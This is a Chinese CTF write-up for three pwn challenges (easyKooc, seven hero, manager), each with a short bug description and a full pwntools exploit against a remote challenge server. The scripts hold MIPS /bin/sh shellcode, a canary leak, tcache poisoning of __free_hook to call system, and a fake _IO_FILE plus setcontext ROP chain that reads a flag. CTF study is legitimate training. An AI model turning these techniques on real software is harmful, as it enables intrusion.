比赛时间有点短,下载附件
easyKooc
mips pwn,UAF漏洞,给了stack地址,利用edit处leak出canary,然后double free申请到栈上修改返回地址为堆地址,提前在堆上布置shellcode
from pwn import *

# Point the pwntools context at the challenge binary (arch/bits/endianness
# are then derived from the ELF, which matters for a MIPS target).
context.binary = './main'
# Uncomment to trace every send/recv while debugging locally.
# context.log_level = 'DEBUG'
def menu(ch):
    """Wait for the 'choice' prompt and select menu entry *ch*."""
    selection = str(ch)
    p.sendlineafter('choice', selection)
def new(idx,content):
    """Menu 1: create note *idx*; *content* is sent as-is (no newline)."""
    menu(1)
    p.sendlineafter('id', str(idx))
    p.sendafter('content', content)
def free(index):
    """Menu 2: release note *index* (prompt ends in 'id!')."""
    menu(2)
    which = str(index)
    p.sendlineafter('id!', which)
def message(mess):
    """Menu 3: write *mess* into the message buffer (sent raw, no newline)."""
    menu(3)
    p.sendafter('?', mess)
# Root cause as stated by the writeup: use-after-free / double free in the
# note allocator plus a stack-address disclosure.  Clearing pointers after
# free and not printing addresses would presumably close both primitives.

# Local QEMU targets (with and without a gdb stub) kept for reference; the
# live run talks to the challenge service.
#p = process('qemu-mipsel -g 1234 -L . ./main.bak',shell=True)
#p = process('qemu-mipsel -L . ./main.bak',shell=True)
p = remote('121.36.166.138',8889)
libc = ELF('./libc-2.23.so')  # loaded but not referenced by this script

# The service prints a stack address after the motto prompt; +0x20 is the
# writeup's adjustment.
p.sendafter('motto!','FMYY')
p.recvuntil('gift for you: ')
stack = int(p.recv(10),16) + 0x20
log.info('Stack:\t' + hex(stack))

# Canary leak through the message buffer: the marker sits directly before
# the canary; the script assumes its low byte is zero (hence rjust) and reads
# the next three bytes back.
message('F'*(0x21-4) + 'FMYY')
p.recvuntil('FMYY')
leaked = p.recv(3)
canary = u32(leaked.rjust(4,'\x00'))
log.info('Canary:\t' + hex(canary))

# Rewrite the message: zeros, the marker, a 0x41 word, a terminator (the
# writeup does not say what the 0x41 is for).
message('\x00'*0x18 + 'FMYY' + p32(0x41) + '\x00')

# MIPS shellcode taken verbatim from the writeup; ends with "/bin/sh".
shellcode = ''.join([
    "\xFF\xFF\x10\x04\xAB\x0F\x02\x24",
    "\x55\xF0\x46\x20\x66\x06\xFF\x23",
    "\xC2\xF9\xEC\x23\x66\x06\xBD\x23",
    "\x9A\xF9\xAC\xAF\x9E\xF9\xA6\xAF",
    "\x9A\xF9\xBD\x23\x21\x20\x80\x01",
    "\x21\x28\xA0\x03\xCC\xCD\x44\x03",
    "/bin/sh",
])

# Double free (writeup): notes 1 and 2 are freed in the order 1, 2, 1.
for idx in (1, 2):
    new(idx,'FMYY')
for idx in (1, 2, 1):
    free(idx)

# Per the writeup the double free lets a later allocation land on the stack;
# note 3 supplies the stack address, note 4 makes the service print a heap
# address ("is: ").
new(3,p32(stack))
new(4,'\x00')
p.recvuntil('is: ')
heap_base = u32(p.recv(3).ljust(4,'\x00'))
log.info('HEAP:\t' + hex(heap_base))

# Shellcode lives in note 5 on the heap; note 6 is the stack-resident one:
# canary, a zero word, then the return address redirected to heap+0x78
# (writeup: return address -> heap).
new(5,shellcode)
new(6,p32(canary) + p32(0) + p32(heap_base + 0x78))

# Menu 4 (presumably exit) returns through the modified address.
menu(4)
p.interactive()
seven hero
realloc导致UAF：当size=0的时候就是一个free的效果。先利用gift位置leak出libc，然后tcache poisoning攻击free_hook即可
from pwn import *

# Trace every send/recv; this script leaves verbose logging on.
context.log_level = 'DEBUG'
def menu(ch):
    """Wait for the 'choice:' prompt and select menu entry *ch*."""
    selection = str(ch)
    p.sendlineafter('choice:', selection)
def new(index,size,content):
    """Menu 1: allocate note *index* of *size* bytes; *content* is sent raw."""
    menu(1)
    for prompt, value in (('index:', index), ('size:', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('content:', content)
def free(index):
    """Menu 3: release note *index*."""
    menu(3)
    which = str(index)
    p.sendlineafter('index:', which)
def edit(index,size,content):
    """Menu 2: resize note *index* to *size* and overwrite it with *content*.

    The writeup states this path goes through realloc, so the size also
    controls whether the chunk is reallocated or (size 0) released.
    """
    menu(2)
    for prompt, value in (('index:', index), ('size:', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('content:', content)
def show(index):
    """Menu 4: print note *index* (prompt matched on 'index' only)."""
    menu(4)
    which = str(index)
    p.sendlineafter('index', which)
def F(index):
    """Menu 2 with size 0: realloc(ptr, 0) frees note *index* but the program
    keeps the pointer (the UAF the writeup relies on)."""
    menu(2)
    for prompt, value in (('index:', index), ('size:', 0)):
        p.sendlineafter(prompt, str(value))
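# The original opened process('./main') here and immediately rebound `p` to
# the remote socket, leaving an orphaned local child (and its DEBUG chatter).
# The local target is kept only as a comment, as in the first script.
#p = process('./main')
p = remote('119.3.89.93',8011)
libc = ELF('./libc-2.29.so')

# Setup: nine 0x10-byte notes, seven of them freed (indices 8 down to 2;
# seven is the per-bin tcache capacity).
for idx in range(9):
    new(idx,0x10,'FMYY')
for idx in range(8, 1, -1):
    free(idx)

# realloc-to-zero releases notes 0 and 1 while their pointers stay live
# (writeup: UAF); the one-byte edit then rewrites the low byte of freed
# note 1's first word.
F(0)
F(1)
edit(1,0x10,'\x50')
new(2,0x10,'FMYY')
new(3,0x10,'/bin/sh\x00')

# Hidden option 666 prints a libc pointer; the distance to printf is the
# writeup's constant for this libc-2.29 build.
menu(666)
p.recvuntil('there is a gift: ')
libc_base = int(p.recv(14),16) - libc.sym['printf'] - 0x201910
log.info('LIBC:\t' + hex(libc_base))
p.sendline('FMYY')

# Note 4 is released twice through realloc-to-zero, with its first 0x10
# bytes zeroed in between (the writeup does not say why).
new(4,0x50,'FMYY')
F(4)
edit(4,0x50,'\x00'*0x10)
F(4)

# tcache poisoning (writeup): the first option-666 input supplies the
# __free_hook address, the second is filler, the third puts system's
# address at __free_hook.
for payload in (p64(libc_base + libc.sym['__free_hook']),
                'FMYY',
                p64(libc_base + libc.sym['system'])):
    menu(666)
    p.sendline(payload)

# Freeing the '/bin/sh' note now goes through the hook.
free(3)
p.interactive()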
manager
add申请的时候,如果size不符合条件,会返回,而edit的时候,没有检测,所以通过残留信息来控制指针,实现任意写
from pwn import *

# Uncomment to trace every send/recv while debugging locally.
# context.log_level = 'DEBUG'
# Point the pwntools context at the challenge binary (arch/bits/endianness
# are derived from the ELF).
context.binary = './main'
def init(string1,string2):
    """Answer the two start-up 'Input StringN:' prompts; both are sent raw."""
    for prompt, value in (('Input String1:', string1),
                          ('Input String2:', string2)):
        p.sendafter(prompt, value)
def menu(ch):
    """Wait for the '>>>' prompt and select menu entry *ch*."""
    selection = str(ch)
    p.sendlineafter('>>>', selection)
def new(name,index,size,content,sign=1):
    """Menu 1: add staff *index* with *name*, an info buffer of *size* bytes
    and *content*.  *sign* is accepted for call-site compatibility only; it
    is never used."""
    menu(1)
    p.sendafter('Input Name of Staff:', name)
    for prompt, value in (('Input Number of Staff:', index),
                          ('Input len of Info:', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('get Info:', content)
def rename(index,name):
    """Menu 2, sub-option 1: replace the name of staff *index* (sent raw)."""
    menu(2)
    p.sendlineafter('Input Number:', str(index))
    p.sendlineafter('Info', '1')
    p.sendafter('name:', name)
def reinfo(index,size,content):
    """Menu 2, sub-option 2: rewrite the info of staff *index*.

    The writeup notes that, unlike add, this path does not validate *size*.
    """
    menu(2)
    p.sendlineafter('Input Number:', str(index))
    p.sendlineafter('Info', '2')
    p.sendlineafter('Input len of Info:', str(size))
    p.sendafter('info:', content)
def free(index):
    """Menu 3: delete staff *index*."""
    menu(3)
    which = str(index)
    p.sendlineafter('Input Number of Staff:', which)
def show(index):
    """Menu 4: print staff *index*."""
    menu(4)
    which = str(index)
    p.sendlineafter('Input staff number:', which)
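# As in the first script the local target stays commented: the original
# spawned process('./main') and immediately rebound `p` to the socket,
# orphaning the child.  The unused `syscall` gadget address was dropped.
#p = process('./main')
p = remote('122.112.231.25',8005)
libc = ELF('./libc-2.23.so')

init('\x01F\n','\x02!\n')

# Two 0x80 entries and one 0x10 entry; freeing 1 then 0 and re-adding 0 with
# a single 0xA0 byte leaves allocator pointers in the buffer that show(0)
# prints back after the 'FMYYSSSS' name.
new('fmyy',0,0x80,'FMYY')
new('fmyy',1,0x80,'FMYY')
new('fmyy',2,0x10,'FMYY')
free(1)
free(0)
new('FMYYSSSS',0,0x40,'\xA0')
show(0)
p.recvuntil('FMYYSSSS')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x60
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x90
log.info('HEAP:\t' + hex(heap_base))
log.info('LIBC:\t' + hex(libc_base))
new('fmyy',1,0x20,'FMYY')

#################################### payload construction
free_hook = libc_base + libc.sym['__free_hook']

# Gadget and structure offsets are the writeup's constants for this
# libc-2.23 build.
pop_rdi_ret = libc_base + 0x0000000000021112
pop_rsi_ret = libc_base + 0x00000000000202F8
pop_rdx_ret = libc_base + 0x0000000000001B92

Open = libc_base + libc.symbols["open"]
Read = libc_base + libc.symbols["read"]
Puts = libc_base + libc.symbols['puts']
IO_str_jumps = libc_base + 0x3C37A0
ret = libc_base + 0x937

# Fake _IO_FILE: vtable pointer IO_str_jumps - 8 followed by setcontext+53
# (the file-structure hijack of the writeup); heap_base + 0x520 is the
# writeup's buffer pointer.
fake_IO_FILE = p64(0) + p64(0)
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(heap_base + 0x520)
fake_IO_FILE = fake_IO_FILE.ljust(0xC8,'\x00')
fake_IO_FILE += p64(IO_str_jumps - 8)
fake_IO_FILE += p64(0) + p64(libc_base + libc.sym['setcontext'] + 53)

# ROP chain: open('./flag', 0) / read(3, heap_base, 0x30) / puts(heap_base).
# The path string sits at offset 0xE8 of the chain, and 0x690 + 0xE8 ==
# 0x778, i.e. heap_base + 0x778 is the path once the chain sits where
# frame.rsp points.
orw = p64(pop_rdi_ret) + p64(heap_base + 0x778)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(Open)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(pop_rsi_ret) + p64(heap_base)
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(heap_base)
orw += p64(Puts)
orw = orw.ljust(0xE8,'\x00')
orw += './flag\x00\x00'

# Frame consumed by setcontext: pivot rsp onto the chain and return into it.
frame = SigreturnFrame()
frame.rsp = heap_base + 0x690
frame.rip = ret

#################################### arbitrary write
# Writeup: add rejects an out-of-range size (0x101 below) and returns early,
# but edit never re-checks, so the name/number already written for entry 4
# are reused as an attacker-controlled pointer.
new(p64(heap_base) + p64(0x100),3,0x38,'\x00'*0x30 + p64(heap_base + 0x310))
reinfo(3,0x10,'FMYY')

menu(1)
p.sendafter('Input Name of Staff:',p64(heap_base + 0x2F0) + p64(0x10))
p.sendlineafter('Input Number of Staff:','4')
p.sendlineafter('Input len of Info:',str(0x101))
new('fmyy',5,0x100,fake_IO_FILE)

# Two writes through the controlled pointer of entry 4:
#   __free_hook  -> exit
#   _IO_list_all -> the fake FILE on the heap
reinfo(4,0x10,p64(free_hook))
rename(4,p64(libc_base + libc.sym['exit']))
reinfo(4,0x10,p64(libc_base+libc.symbols['_IO_list_all']))
rename(4,p64(heap_base + 0x3A0))

# Place the frame and the chain, then free(0) -> exit, whose stdio cleanup
# presumably reaches the fake FILE (the writeup leaves this step implicit).
new('fmyy',6,0x100,str(frame))
new('fmyy',7,0x100,orw)
free(0)
p.interactive()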